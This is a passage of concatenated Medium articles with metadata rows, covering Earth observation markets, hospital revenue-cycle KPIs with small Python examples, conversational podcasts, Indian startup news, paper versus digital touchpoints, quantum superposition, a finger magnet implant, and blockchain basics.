EO applications revealed exciting results and project ideas, from aiming to generate off-grid electricity for remote communities in Nigeria, global assessment of land degradation, and, measuring the height of Earth’s surfaces in detail and the loss of ice in glaciers. Last, but not least, are the improvements in computational science for satellite imagery processing. Using artificial intelligence (AI) and machine learning, ESA unveiled a global high-resolution land cover dynamics map that shows how vegetation and land productivity change through the year. Scientists are also using machine learning and surface deformation data to predict earthquakes. Radiant Earth Foundation announced its plans to be the catalyst for democratizing machine learning applications through ML Hub Earth commons, while the Rockefeller Foundation invested in Atlas AI that will use machine learning and “ground truth data to estimate economic activity and crop yield from satellite imagery.”
Inroads are also made with the SpatioTemporal Asset Catalogs (STAC) that allows users to search for imagery and other assets across multiple providers, and Analysis Ready Data (ARD) to make U.S. Landsat archive data more “straightforward to use.”
As exemplified by this first quarter of 2019, this is an exciting time for the Earth observation marketplace — and we look forward to providing you updates on how the market continues to change.

Source: https://medium.com/radiant-earth-insights/the-stage-of-maturity-earth-observation-in-a-new-era-of-space-exploration-26f4e57941b8 (Radiant Earth Foundation, 2019-04-01). Tags: Spacex, Space Exploration, Satellite Technology, Machine Learning, Earth Observation.
Raise Your Hospital KPIs with a Focus on Cause and Effect Relationships

Healthcare organizations depend on monthly reporting of key performance indicators (KPIs) to measure financial performance and operational efficiency. As a result of the pandemic, almost all health executives expect a decline in revenue, so keeping a finger on the pulse of KPIs may be more critical than ever before.
Credit: Fullvector/Freepik
Analytic dashboards are commonly used to track performance between monthly KPI reporting — but like monthly reporting, the activity analyzed has already happened, and the opportunity to avoid situations that adversely affect KPIs, such as denials, has passed.
The key to keeping KPIs strong and cash flowing is to avoid situations that inflate days in A/R, denials, and write-offs, and that decrease net collections. Unfortunately, even after substantial time and effort have been invested in identifying the root cause of situations that result in KPI disruptions, often the solutions are not permanent, and the same issues crop up time and again. The answer to maintaining healthy KPIs is pinpointing and lastingly correcting the situational causes that later affect RCM outcomes — the question almost all facilities face is how?
Identify root causes
A combination of experience, historical reporting, and automated analytic technology can get to the heart of operational deficiencies that cause negative financial performance. There can be many reasons for weak KPIs, but some of the most common causes include:
Days in A/R KPI factors
Slow claims submissions
High denial rates
Delayed payment posting
Claims denial KPI factors
Unsolved technology issues
Inaccurate or incomplete eligibility and insurance verification
Outdated rules engines
Write-off KPI factors
Fatal denials
Incorrectly applied adjustments
Timely issues
Net collections KPI factors
Outdated fee schedules
Failure to collect patient payments
Under or over coding
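As a quick illustration of how two of these KPIs are commonly computed (the formulas are the standard industry definitions; the dollar figures are invented):

```python
def days_in_ar(total_ar, period_charges, period_days=90):
    """Days in A/R = ending A/R divided by average daily charges."""
    return total_ar / (period_charges / period_days)

def net_collection_rate(payments, charges, contractual_adjustments):
    """Payments as a share of collectible revenue (after contractuals)."""
    return payments / (charges - contractual_adjustments) * 100

# $1.8M outstanding against $4.5M charged over 90 days -> 36 days in A/R.
print(round(days_in_ar(total_ar=1_800_000, period_charges=4_500_000)))  # 36
# $950k collected on $1M collectible -> 95% net collection rate.
print(round(net_collection_rate(950_000, 1_500_000, 500_000)))          # 95
```

Watching these two numbers month over month is what surfaces the slow-claims and denial problems listed above.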
All situations leading to poor performance begin with data points that are eventually brought together on claims. Some circumstances that cause claims problems can be solved using existing technology; for example, most EHR systems will not let staff book an appointment until all relevant information (data) is recorded. Therefore, if birth dates are consistently missing from patient records, the platform can be set to lock until a birthdate is set. However, persistent RCM issues usually have an element that is much harder to control, for example, authorization denials because of an existing technology glitch or under coding due to inadequate documentation. These problems often need solutions that reach across departments and platforms. Up until now, a lack of communication between systems and siloed information has made permanent solutions impossible.
Reach across your enterprise to correct root causes at the source
Fortunately, there is a solution that can reach across disparate systems and facilities and alert staff when there is a data point that could later lead to operational or performance issues — healthcare business assurance.
Healthcare Business Assurance technology is a proactive solution that provides a permanent fix to RCM issues — wherever they originate. It is layered on top of existing technology and triggers an alarm to alert staff to problematic data. Since alerts happen in real-time, corrections can be made immediately before a claim is generated.
The problem: Decreasing net collections
For example, a large hospital system was continually hearing complaints from providers about under-compensation and saw a worrying trend toward declining revenue. After investigation, the group identified two leading root causes of the revenue leakage:
Problematic documentation from providers resulting in under coding and low RVUs
Failure to prove medical necessity
The solution: Proactive correction of root causes
As with many RCM issues, the solution required a multi-pronged approach reaching across systems and departments. Hospital staff quickly realized BA technology was ideal for providing oversight of operations and delivering lasting corrections. The team placed strategic alarms to instantly flag problematic data, allowing staff to correct issues before claim generation.
Solved: Inadequate documentation and inaccurate coding
One primary source of revenue leakage involved transcatheter aortic valve implementation (TAVI) coding. The solution involved multi-tiered alarms placed on the EHR and coding applications that virtually eliminated the circumstances ultimately leading to low net collections. Alerts allowed staff to be aware of and correct scenarios before claims were generated — accelerating overall collections and providing the information needed for accurate coding. Scenarios that triggered alarms included:
Missing fields in provider notes
Lack of terminology in notes to prove medical necessity and align with NCDs and LCDs
Lack of detail in notes to justify accurate procedure coding
Coding anomalies involving coding conventions such as NCCI edits, MUEs, and add-on codes
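A minimal sketch of how such data-driven alert rules might look in code (the rule names and note fields here are hypothetical illustrations, not Effy's actual API):

```python
# Each rule is (rule_id, predicate); the predicate fires on a problem note.
ALERT_RULES = [
    ("missing-field", lambda note: not note.get("indication")),
    ("medical-necessity",
     lambda note: "medically necessary" not in note.get("text", "").lower()),
    ("procedure-detail", lambda note: not note.get("valve_size")),
]

def check_note(note):
    """Return the IDs of every alert rule that fires for a provider note."""
    return [rule_id for rule_id, fires in ALERT_RULES if fires(note)]

# A TAVI note missing necessity language and the valve size triggers two alerts.
note = {"indication": "severe aortic stenosis", "text": "TAVI performed..."}
print(check_note(note))  # ['medical-necessity', 'procedure-detail']
```

Because the rules run on the note data itself, alerts fire in real time, before a claim is ever generated.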
After correcting documentation and coding, RVUs reflected work done and raised net collections. (In many cases, the top 15–40 codes can drive up to 90% of revenue.) Then, alerts were placed on the RCM analytics platform to indicate when a provider deviated from expected RVUs as determined by historical data and compared with other providers performing the same procedures. In a noticeably short amount of time, providers had confidence in their compensation or (through education triggered by alerts) understood the documentation changes needed to ensure they captured the information necessary for accurate coding.
A permanent solution
Continual, automated monitoring and reporting ensure inefficiencies are permanently corrected. In the event an alert is triggered, a customized, integrated case-management workflow tool ensures timely follow-up that protects RCM outcomes. Flexible business rules engines can accommodate an unlimited number of triggers, alarms and automated case-management workflows, allowing organizations to build upon improvements and create lasting change.
Boost your hospital KPIs and increase overall provider and patient satisfaction
Organizations that concentrate on permanent solutions to circumstances that adversely impact KPIs will regain control of financial performance, ensure a steady stream of revenue, and benefit from a smoother revenue cycle experience that raises both staff and patient satisfaction.
For more on how Effy Healthcare can help you eliminate the root causes of underperforming KPIs visit www.effyhealthcare.com or contact us through [email protected].

Source: https://medium.com/@effyhealthcare/raise-your-hospital-kpis-with-a-focus-on-cause-and-effect-relationships-5fe08f4ef88c (Ana Elias, 2020-12-18). Tags: Healthcare, Performance, Technology, Kpi, Bi Dashboards.
Listening to Podcasts at Oxford in 1374 and Kansas in 1974

Why do we love those conversational podcasts?
Photo by NeONBRAND on Unsplash
If you were a student at a medieval university, you listened to lectures.
And listened and listened and listened to lectures, often more than ten hours a day.
But they weren’t like lectures at today’s universities, where hundreds of students sit in a hall and listen to a professor deliver a monologue.
The medieval morning lectures were like that, but come afternoon, the lectures morphed into dialogue. The professor would assert a position, a graduate assistant would field questions or objections posed by undergraduates, and discussion ensued. At the end, the professor would summarize that afternoon’s conversation.
It was the “Scholastic disputation.”
Each session was meant to unfold knowledge gradually, as informed and inquisitive minds rubbed against one another, sharpening each other in the process, like knives rubbing against a whetstone.
Kansas: Early 1970s
The disputation, like everything else Scholastic, evaporated over the centuries and gave way to the mass lecture hall, with one professor doing all the talking.
In the 1970s, three professors at the University of Kansas brought back the disputation.
The three professors were John Senior, Frank Nelick, and Dennis Quinn, and they led the Integrated Humanities Program, a program dedicated to the wild notion of restoring a sense of beauty and poetic knowledge in its students.
The Program had a lot of facets (e.g., waltzes, star-gazing, great books), but its centerpiece may have been conversations among the three professors with the students watching.
The following description of these highly-popular sessions is taken from Fr. Francis Bethel’s John Senior and the Restoration of Realism.
The 80-minute classes were neither planned nor rehearsed. They weren’t even mentally prepared beforehand. Said Quinn in an interview:
We didn’t plan the lectures. We had lunch together before class started and on the way over to class I’d say, ‘Well, what are we going to talk about?’ and they’d say, ‘I don’t know. What book are we reading?”
The conversational style captivated the students. The professors had a solid command of the subjects and could easily speak extemporaneously about them. When one spoke, the other two were stimulated to respond: back and forth for eighty minutes.
The harmony was remarkable, with never a false note — no interruption, no impatience, not even noticeable disagreements. Here were three friends who enjoyed looking at beautiful things together and helping students discover them. The class was something like a Socratic dialogue in that it rose from the sensible to the spiritual, with each of the three men contributing his insights.
Another faculty member called it an “intellectual drama.”
Students weren’t allowed to take notes (it would hamper listening). Students left the classes “enthralled” and often lingered and mused among themselves: continuing the conversation about the great subjects.
The conversations on weighty subjects were always accompanied by a lot of laughter. One former student recalled, “merriment could suddenly turn into the deeply profound; a vision of things where sadness and joy lay down together in meaning.”
The postmodern rise of conversation
Unfortunately, the Integrated Humanities Program (which was Catholic to the core, albeit only impliedly) ran into conflict with the secularists at the University of Kansas and it was choked out of existence.
But its conversational mode of learning made a comeback in March 2006.
That’s when Russ Roberts launched the Econtalk podcast. It wasn’t the first podcast to feature a guest format, but it was one of the first (podcasts didn’t catch hold until late 2004) and the only one I know of from 2006 that featured learned professors chatting about weighty subjects in a light-hearted atmosphere.
It proved remarkably successful. Today, many podcasts feature long, free-wheeling conversations. The Joe Rogan Experience is the most notable example.
And just like the Scholastic disputation and the Integrated Humanities Program, the conversational podcast has become remarkably popular.
It turns out that there’s “something about” the conversational approach to learning.
Four possible reasons we love conversational podcasts
They’re genuine
The podcast conversation is rarely an interview.
Interviews are boring: they’re fabricated.
The interviewer often sends the guests the questions ahead of time or they agree on what questions, in general, will be asked. It’s all planned out. The only time it gets interesting is if one of the participants goes off-script.
It’s also one-sided: Only the guest is supposed to provide information.
A conversation isn’t any of that. It’s mostly spontaneous, with genuine give-and-take, with both parties providing their opinions and information.
The conversational podcast is more “authentic.” I loathe that word (there’s nothing more inauthentic than being concerned about what is authentic), but it’s apt. The conversational podcast is genuine. It normally features amicable acquaintances discussing various topics, just like two friends might in a coffee shop. It’s pleasant: “joy tainted,” even, often giving way to mirth, like the Integrated Humanities Program classes.
We think in dialogue
I also think the conversational approach better captures how we think. Discursive reasoning is dialogic. When we think about a problem, it often takes the form of imaginary discourse: arguments, debates, discussions in our head with a “phantom other.”
How much better when the phantom other is an actual, live, unpredictable person?
Conversations are integrated
Something happened in the fifteenth century that changed our entire mental landscape: the printing press was invented.
The effects were enormous, but perhaps the biggest effect still isn’t fully understood: it changed how we perceive knowledge and how it is attained. With the printing press, Marshall McLuhan pointed out, sight came to dominate our learning. We started to view learning as a solitary affair, one of “me and the book: subject-object.”
Prior to the printing press, we didn’t think of learning in that manner. The great modern Jesuit philosopher Walter Ong dedicated his doctoral dissertation to explaining how, prior to the printing press, thinking was understood as something that takes place in connection with talking: discourse and disputation. (See John Peterson, Pop Goes the Culture, 119.)
Walter Ong, Marshall McLuhan, and others have spent a lot of ink and analysis explaining how the printing press’s emphasis on sight stilted and warped our development.
You can read their weighty works.
Or you can just notice the popularity of the Integrated Humanities Program, Russ Roberts, and The Joe Rogan Experience and realize that they’re popular for a reason: reliance on books alone starved us for a more integrated approach to learning, which the conversational podcasts feed.
It’s Postmodern . . . ish
I’d also submit there is something vaguely postmodern about the conversational approach.
Jacques Derrida proved that words are simply not adequate to capture full reality. No word, in Derrida’s terminology, has “presentness”: No word perfectly captures an underlying reality. Words fit into a web where they have reference points to other words to tell us what they mean, but they have no underlying reality. To make it even more elusive, the web of words itself is constantly shifting, providing no fixed points.
Derrida concluded from this that there is no objective reality or truth. That’s absurd, but his fundamental insight isn’t: objective reality or truth can’t be captured by words. There’s always “more” than can be articulated.
The conversational approach better captures truth in this way. The participants bat words back and forth, like the web they exist in bats them back and forth, forcing them to constantly shift and refine their statements, like reality does. | https://medium.com/the-weekly-eudemon/listening-to-podcasts-at-oxford-in-1374-and-kansas-in-1974-956b5f5c9c5e | ['Eric Scheske'] | 2020-12-22 13:22:29.340000+00:00 | ['Technology', 'Knowledge', 'Learning', 'History', 'Ideas'] |
147 | IC Bytes of the Week: 06/12/20 | Welcome to IC Bytes, where we quickly sum up the hottest news of the week in tech and business — in layman’s terms that our young readers can easily understand.
⚡Top things that happened
Flipkart announces PhonePe spin-off, digital payments company to be valued at $5.5 billion
E-commerce giant Flipkart is doing a partial spin-off of PhonePe, India’s largest digital payments platform. The move will help PhonePe access dedicated, long-term capital to fund its growth ambitions including going public by 2023.
In this financing round, PhonePe is raising $700 million in primary capital at a post-money valuation of $5.5 billion from existing Flipkart investors including Tiger Global, in a round led by Walmart, the world’s largest retailer, according to industry sources. They said PhonePe’s pre-money valuation is $4.8 billion.
Source: TechStory
The fresh funding would come to PhonePe in two tranches of $350 million each and help PhonePe to compete with rivals such as Google Pay, Amazon Pay and Alibaba-backed Paytm.
2. Amazon India plans to use electric vehicles for last-mile delivery
Amazon is reportedly in talks with a clutch of electric vehicle (EV) manufacturers to procure customised electric vehicles for last-mile deliveries. It is in talks with both automobile giants and startups including Mahindra Electric, Kinetic Green, Bengaluru-based Altigreen, Hyderabad’s e-trio and Gayam Motor Works and Delhi-based EV aggregator SmartE. Kinetic is expected to start commercial deliveries of its electric rickshaws to Amazon delivery partners this month, with an initial order of 250–300 units.
While the talks with other EV manufacturers are still underway, these companies are reportedly running pilots to showcase their products before scooping up larger orders. Beyond the big EV order, Amazon may also make strategic investments in some of these companies to align long-term interests in servicing its requirements. The e-commerce giant is looking for EVs that can carry a payload of about 500–600 Kg with a range of about 150 Km and a top speed of 50 Km per hour.
Amazon’s e-commerce rival Flipkart has committed to transition into a 100% EV fleet by 2030.
3. Oyo has $1 billion to fund operations until IPO, CEO tells employees
Ritesh Agarwal, founder and chief executive officer of Oyo Hotels, told employees the Indian startup is making progress in recovering from the coronavirus fallout and has about $1 billion to fund operations until an initial public offering.
The founder made the comments in a chat with Oyo board member Troy Alstead, after the once high-flying company endured months of layoffs and losses as Covid-19 hammered its business. Oyo is one of the largest startups in the portfolio of SoftBank Group Corp., reaching a valuation of $10 billion before the downturn.
Agarwal said the company’s focus is on getting revenue per available room to 60% to 80% of pre-pandemic levels across all markets. India, China, Japan and Southeast Asia are making progress in reaching that range, he added.
4. Indian SaaS firms set to rake in $18–20 billion revenues by 2022
SaaS (Software as a service) companies founded by Indian entrepreneurs are poised to reach USD 18–20 billion in revenue, with the potential to capture 7–9 per cent share of the global SaaS market by 2022, a report by Bain & Company said on Tuesday.
The ‘India SaaS Report 2020’, which analysed a wide range of Indian SaaS companies, said four key archetypes of Indian SaaS companies are expected to gain further traction.
This includes SMB-focused SaaS companies (like Zoho and Freshworks) that target global markets with easy-to-use horizontal offerings and vertical-specific SaaS companies (like Locus and Innovaccer) that are disrupting underserved verticals like healthcare and logistics.
Also, globally competitive companies in emerging tech (such as Postman and Hasura), and India initiators with products tailored for the domestic Indian market (Darwinbox, MyGate and Yellow Messenger) are expected to see strong growth.
5. Razorpay, PayPal come together to help MSMEs
Razorpay has partnered with global digital payments major PayPal to enable seamless international payments for Indian micro, small and medium-sized enterprises (MSMEs) and freelancers.
The company’s partner businesses can now integrate with PayPal and accept payments from international customers from across 200 markets conveniently and securely, reducing wait time from days down to minutes, Razorpay said.
Traditionally, micro-entrepreneurs have found it difficult to accept international payments on cards via payment gateways as many of them could not pass the eligibility checks at the banks’ end. By integrating PayPal into Razorpay’s payment platform, freelancers and MSMEs will now be able to accept international payments without having to write a single line of code, Razorpay said.
6. Artificial intelligence alone can add $500 billion to the economy: Google India
Google India on Thursday said artificial intelligence alone can add USD 500 billion to the economy and assist in better forecasting of floods and more accurate diagnosis of diseases.
The company has committed USD 10 billion for expanding India’s digital footprint, a top official said.
Source: The Economic Times
Google had recently picked up a 7.73 per cent stake in Reliance Industries Ltd’s (RIL) digital subsidiary, Jio Platforms Ltd. The two companies have also announced plans to come up with “an entry-level affordable smartphone”.
7. Funding: Cred raises $80M in Series C funding as valuation almost doubles, MobiKwik raises funding of INR 52 crore, Eightfold AI raises $125M
CRED, an app that helps you pay and manage your credit card bills, has raised $80 million. The round was led by DST Global and also saw participation from existing investors Sequoia Capital and Ribbit Capital.
With the Series C round of funding, the Kunal Shah-led startup’s value has almost doubled to $800 million — from its valuation of $450 million a year ago. This brings the just two-year-old startup closer to being a unicorn (a valuation of over a billion dollars). It raised funds twice in 2019 alone — a $125 million Series A round and $120 million in Series B funding from Sequoia, Ribbit Capital, and more.
Fintech platform MobiKwik on Friday announced that it has raised INR 52 crore in a fresh round of funding that was led by Hindustan Media Ventures, with participation from Infosys co-founder Kris Gopalakrishnan’s family office Pratithi.
MobiKwik will use the fresh capital for growth in all key business segments of the firm, i.e. in digital credit and cards, consumer payments and payment gateway.
Talent intelligence platform Eightfold AI said that it has raised USD 125 million in its latest funding round, valuing the Noida-based company at USD 1 billion. The Series D round was led by General Catalyst, with participation from existing investors such as Capital One Ventures, Foundation Capital, IVP and Lightspeed Venture Partners, the company said.
So far, the AI-powered talent intelligence platform, which uses a single solution to manage the entire talent lifecycle, has raised more than USD 180 million. Eightfold has more than quadrupled its sales since the last round of equity funding in April 2019 and boasts a customer base that includes Tata Communications, AirAsia, Bayer, Capital One and Micron. | https://medium.com/internclick/ic-bytes-of-the-week-06-12-20-57e1a4927c12 | ['Team Internclick'] | 2020-12-12 07:33:22.761000+00:00 | ['Ic Bytes', 'Amazon', 'Business', 'Funding', 'Technology']
148 | Will we ever replace paper? | Will we ever replace paper?
Why physical experiences are fighting back against the future of screens
I have some sort of a feeling that paper could never be replaced. I mean, despite our best efforts paper has already been replaced across industries over the last decade in an effort to make everything electronic — from the data we store to the way we communicate — digital connectivity has vastly improved every inch of business. It just would never make sense for an organisation to operate intentionally on paper anymore.
Yet still, think of any task you could perform with paper and I guarantee there is a digital counterpart to it. Paper is no longer essential due to the technology available to us, yet it still exists with no sign of going anywhere. Before you think this argument becomes ridiculous, that it is all about paper, then let me assure you it’s not. It’s about the core experience paper offers us and why it could perhaps never be replaced — this is not only paper, it’s about how so many digital touch points are failing to address the needs they were designed for.
For the past five years, how we design services has been dictated and limited by the touch points that were available to us — the PC, mobile and analog touch points. Much emphasis was placed on creating experiences delivered through digital screens and as a result, people spent more time interacting via device than in person. — FJORD
Ok, so it may not feel like these digital touch points are failing us, and who am I to say they are, but there’s a strong sense that we are beginning to sub-consciously fight back against them. Think of the last “to-do” list you made: was it on paper, post-its or something digital? Maybe your iPhone notes or Trello?
“The future of screens should be about blending physical and digital experiences”
For the majority of us I can comfortably say we used something analog like paper and there’s a stronger reason behind this than some may think. It can be easier, faster, more available at the time but those are only surface arguments that can also be used for digital touch points.
One of the main reasons we still use paper for To-do lists is the sensory experience it stimulates. The touch of the page, the link between your pen, hand and mind and the tactility of having your next goal in your hand. The action of writing or reading something physical has a much stronger sense of connection than say — a digitally typed note that may or may not send you a reminder 15 minutes before the task needs to be completed. This emotional stimuli, the dopamine it sends to your brain is something that has arguably not yet been recreated through digital To-do list services.
Paper is just one small example of this sub-conscious dissatisfaction with our digital touch points. Do I even need to mention the growing angst against our screen addiction, or our need to separate core technology out of one device? Where once the goal was to pack as much as possible into one screen, we suddenly find ourselves wanting experiences that offer something more personal and meaningful. Surprisingly, it seems to me that the next step is actually to unpack our screens of all of these solutions into separated (physically integrated) experiences.
The future of screens should be about blending physical and digital experiences, solutions that create more sensory experiences — even for the simplest of tasks such as To-do lists. We should no longer be using digital as a sole touchpoint but as an enabler for our physical touchpoint — take this next example as a reference.
Restaurants have started to offer apps to download before visiting so that users can order and pay without the table service. Yes, Wetherspoons in the UK is a great champion of this particular service, as it has targeted the needs of its consumers in the correct context. But why are restaurants that are famed for their customer service also offering these apps? I can’t say I would visit a nice restaurant and be amused to find I had to download an app onto my already-full phone to order something with no personal recommendation or conversation — the context of a touchpoint like this just isn’t appropriate. Instead, why aren’t these restaurants looking to build on their customer service by using digital services or technology to enhance it, thus creating a more sensory and admirable experience? Starting with the paper menu, perhaps?
Technology should inspire us to design services that enable a positive experience, the line between physical and digital touchpoint is one such area that will start to be addressed more and more but until then no, I do not think we will ever replace paper. | https://uxplanet.org/will-we-ever-replace-paper-1dccf12f295b | ['Jack Strachan'] | 2018-05-14 10:50:33.838000+00:00 | ['Innovation', 'Technology', 'Design', 'UX Design', 'UX'] |
149 | The Three Pillars of Quantum Computing | The Three Pillars of Quantum Computing
The fundamentals of understanding how a quantum computer works
Image by Gerd Altmann from Pixabay
Quantum computing is one of those topics that people find very interesting yet quite intimidating at the same time. When people hear — or read — that the core of quantum computing is quantum physics and quantum mechanics, they often get intimidated by the topic and steer away from it. I will not deny that some aspects of quantum computing are incredibly puzzling and hard to wrap your mind around. However, I believe that you can understand the basics and the overall ideas of quantum computing without overcomplicating things. That is what I will attempt to do in this article and some upcoming articles about various quantum computing-related topics.
In this article, we will talk about the three fundamentals of quantum computing: superposition, qubits, and entanglement. These three concepts are the building stones to understanding how quantum algorithms do their magic and how quantum computing has the potential to solve some of the problems classical computers have failed to solve.
Now, let’s tackle each of them in detail…
Superposition
By author using Canva
Superposition may be the most famous quantum mechanics term ever! I guarantee you have heard of it before, not directly perhaps, but as the infamous Schrodinger’s Cat. In case you have never heard of the one and only cat: Schrodinger’s Cat is a thought experiment that explains the concept of quantum superposition. It goes like this: assume you have a cat and a sealed bottle of poison together in a closed box. The question now is, how would you know if the poison bottle broke open and the cat died, or if the cat is still alive inside the box?
Since you can’t tell for sure if the cat is dead or alive without opening the box, the cat is now in a state of superposition, which simply means there’s a 50/50 chance of the cat being dead or alive. That’s it! In technical terms, superposition is a principle — much as in classical physics — under which a physical system exists in two states at the same time. Superposition is not an absolute term; that is, it doesn’t mean anything by itself; it instead refers to a specific set of solutions. The set of solutions differs based on your application and what you’re trying to achieve. Nevertheless, the most commonly used set of solutions is ALL possible solutions, also known as the Hilbert space.
In the case of Schrodinger’s cat, the solution space (all possible states of the cat) contains only two states: the cat is either dead or alive; there’s no other possibility. Hence the superposition of that solution space is that the cat is both dead and alive at the same time, or in other words, the cat is 50% dead and 50% alive. If we were to put that in equation form, it would look like this:
|cat⟩ = (1/√2)|dead⟩ + (1/√2)|alive⟩
This equation represents the mathematical form of the superposition of both states of the cat (dead and alive) with a 50/50 probability. The probability of any state equals the absolute square of its amplitude. In our cat equation, both states have the same amplitude of 1/√2, which, when we take the absolute square, gives us 1/2, or 50%. We also notice that the 2 under the square root represents the size of the Hilbert space.
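To make the amplitude-to-probability rule concrete, here is a minimal sketch in plain Python. It only illustrates the arithmetic described above; the "dead"/"alive" labels and the seeded random draw are my own illustrative choices, not anything from a quantum library:

```python
import math
import random

# Amplitudes of the two basis states, as in the cat equation: both 1/sqrt(2).
amplitudes = {"dead": 1 / math.sqrt(2), "alive": 1 / math.sqrt(2)}

# The probability of each outcome is the absolute square of its amplitude.
probabilities = {state: abs(a) ** 2 for state, a in amplitudes.items()}
print(probabilities)  # each is 0.5 (up to floating-point rounding), summing to 1

# "Opening the box": the superposition collapses to one definite outcome,
# drawn according to the probabilities above.
random.seed(0)
outcome = random.choices(list(probabilities), weights=probabilities.values())[0]
print(outcome)
```

Running this repeatedly without the fixed seed would give "dead" about half the time and "alive" the other half, which is what the 50/50 superposition means operationally.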
So, our cat state remains a mystery, that is until we finally open the box. Once we do that, the superposition will collapse, and the cat will be either 100% dead or 100% alive. | https://medium.com/digital-diplomacy/the-three-pillars-of-quantum-computing-d80ff5f50ec7 | ['Sara A. Metwalli'] | 2020-09-22 15:25:04.277000+00:00 | ['Quantum Computing', 'Quantum Physics', 'Demystifying Technology', 'Technology', 'Science'] |
150 | Biohacking my First Steps into Transhumanism. | The Operation.
The procedure was simple. My hand was cleaned and massaged, and eventually, a needle was inserted into my finger. No anaesthetic was used. This needle created the initial incision. Eventually, a second needle was inserted, to enlarge the incision and create a pocket where the magnet would sit. This portion of the procedure was incredibly painful. The sensations got progressively worse as a magnet was injected into the large pocket that now existed within my finger. The insertion of the magnet was a particularly intense sensation.
A second magnet was used to drag the inserted magnet deep into the pocket. I was able to feel the magnet ripple over the nerves inside my hand. Once this was done, the blood was cleaned off and a bandage placed on my finger. It was left to heal with the recommendation to clean it twice a day with salt water. Before bed, I removed the bandage to allow for the wound to develop a scab in the presence of my own bacteria. For the rest of the day, no sensation could be felt other than mild pain.
Healing Process
It took about 2 days before I was able to feel any magnetic field; the first was my laptop charger, from which I felt a slight buzzing. During the first 2 weeks, though, I was advised not to use my left hand in close proximity to any magnetic object, as it’s important that the nerves reform and grow around the implant.
What does it do?
If I enter an area with a high magnetic field, I am able to detect it.
If it’s a microwave or a motor, it’s the smallest buzzing sensation; if I’m close to a hard drive, I feel it click and tick; and with high-power cables, I am able to feel the small buzz surrounding them.
Conclusion.
The ability to sense magnetic fields has become greater: as far as my understanding goes, I am now able to detect vibrations from phone speakers, microwaves, and much more. The magnet isn’t getting in the way of everyday life, although something to be aware of is that if you were to attempt pull-ups it would be quite difficult. The same goes for heavy lifting. Luckily my magnet crept to the left side of my finger. This has left the pad of the finger mostly clear, meaning I’m able to lift and carry things with great ease, although when I do, the magnet’s sensitivity to vibrations is reduced. In my opinion, this is worth it, as I maintain more functions.
The ability to detect magnetic fields is an incredible feeling that can only be described as a tiny vibrating sensation within the finger. Laptop chargers, motors, and other things have this field, and it has allowed me to detect where household appliances are wasting energy.
For example, being able to detect and feel a magnetic field coming from my flatmate's Microwave clock about 7 inches (ca. 18 cm) away leads me to conclude that there is a large amount of waste energy being used. | https://medium.com/@owenharriman7/biohacking-my-first-steps-into-transhumanism-2f193790b4bd | ['Owen Harriman'] | 2020-12-28 19:14:16.911000+00:00 | ['Biotechnology', 'Magnetic', 'Technology', 'Medicine', 'Transhumanism'] |
152 | How Blockchain Technology Can Change Our Lives? | Technology has always changed human lives in many ways. In ancient times, fundamental innovations helped humans fight the dangers that the natural world persistently gave rise to. For example, imagine the time when humans started to use military equipment. That equipment was surely simple at first, but over time it went through a process of evolution and development. Blockchain technology is the kind of innovation that has commenced a shift from the traditional approach of discovering nature’s potentials to a more noble one.
Blockchain Technology Is a Decentralized Ledger That Distributes the Information Throughout All Possible Nodes.
Simply put, Blockchain technology is a decentralized ledger that distributes the information throughout all possible nodes. But this definition might be rather technical and hard to grasp. We had better think about how traditional banking works in order to gain a deeper knowledge of how Blockchain works, primarily in modern finance.
Traditionally speaking, banks are centralized establishments that store a huge amount of private information. Therefore, banks have always had the power to control the way citizens behave, specifically when it comes to financial issues. Banks, moreover, have a kind of monopolized right to issue bonds and other facilities without the permission of account holders. In a broad sense, traditional banking is a concept that perpetuates injustice. It is not uncommon to say that there are still millions, and surprisingly billions, of people out there who do not have any access to bank facilities.
When it comes to traditional banking, only a few people have their interests secured, while many are pushed to the corner or ignored. Blockchain technology was invented to provide financial inclusion, although it must be said that Blockchain is nowadays employed in many fields such as supply chains, voting mechanisms, real estate processing, personal identity security and many others.
Blockchain Removes Third Party Supervision
In traditional banking, government authorities or centralized agencies control account holders’ private data, and if they please, they can modify the policies to gain more profit. But with the advent of Blockchain technology, that power has been delegated to the people who are engaged in financial activity. Therefore, all the traders in the Blockchain territory can see and confirm the data that are continuously stored in the blocks.
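The "ledger that everyone can see and confirm" idea rests on blocks being chained together by hashes. Here is a toy sketch in Python (not any real blockchain’s data format, and with made-up transaction strings) illustrating why tampering with a past record is detectable: each block stores the hash of the previous one.

```python
import hashlib
import json

def block_hash(block):
    # Hash the block's contents deterministically.
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def add_block(chain, data):
    # A new block commits to the hash of the block before it.
    prev = block_hash(chain[-1]) if chain else "0" * 64
    chain.append({"data": data, "prev_hash": prev})

def chain_is_valid(chain):
    # Every block must reference the hash of its predecessor.
    return all(
        chain[i]["prev_hash"] == block_hash(chain[i - 1])
        for i in range(1, len(chain))
    )

ledger = []
add_block(ledger, "Alice pays Bob 5")
add_block(ledger, "Bob pays Carol 2")
print(chain_is_valid(ledger))   # True

ledger[0]["data"] = "Alice pays Bob 500"   # tamper with history
print(chain_is_valid(ledger))   # False: the tampering is now detectable
```

Because each block commits to the hash of the one before it, rewriting history means recomputing every later hash, and on a real decentralized network it also means convincing the other nodes to accept the rewrite.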
With The Help of Smart Contracts, Everything Becomes Simpler
One of the novel features of Blockchain technology is smart contracts. These contracts pave the way for the autonomous implementation of transactions. Therefore, we can expect that with the help of smart contracts, not only would there be no need for heavy piles of legal papers, but a considerable amount of time could also be saved instead of being spent on unimportant tasks.
With the help of smart contracts, Blockchain automates the manual and time-consuming tasks which traditionally require a substantial amount of work.
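As a conceptual illustration of the "autonomous implementation of transactions", here is a toy escrow written in plain Python. Real smart contracts are deployed on a blockchain (for example, written in Solidity) and enforced by the network rather than by one machine; the class and method names below are purely my own illustrative choices:

```python
class EscrowContract:
    """Toy escrow: payment is released automatically once delivery is confirmed."""

    def __init__(self, buyer, seller, amount):
        self.buyer = buyer
        self.seller = seller
        self.amount = amount
        self.delivered = False
        self.paid = False

    def confirm_delivery(self, confirmer):
        # The contract's terms are code: only the buyer may confirm.
        if confirmer != self.buyer:
            raise PermissionError("only the buyer can confirm delivery")
        self.delivered = True
        self._settle()

    def _settle(self):
        # No notary, clerk, or bank: the moment the condition holds,
        # the contract enforces its own terms.
        if self.delivered and not self.paid:
            self.paid = True

contract = EscrowContract("alice", "bob", 100)
contract.confirm_delivery("alice")
print(contract.paid)  # True: settled with no third party involved
```

The point is not the code itself but the shift it represents: the agreement’s terms and their execution live in the same place, so there is no pile of legal paperwork to process and no intermediary to wait on.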
Blockchain Implementation in Supply Chain and Its Implication
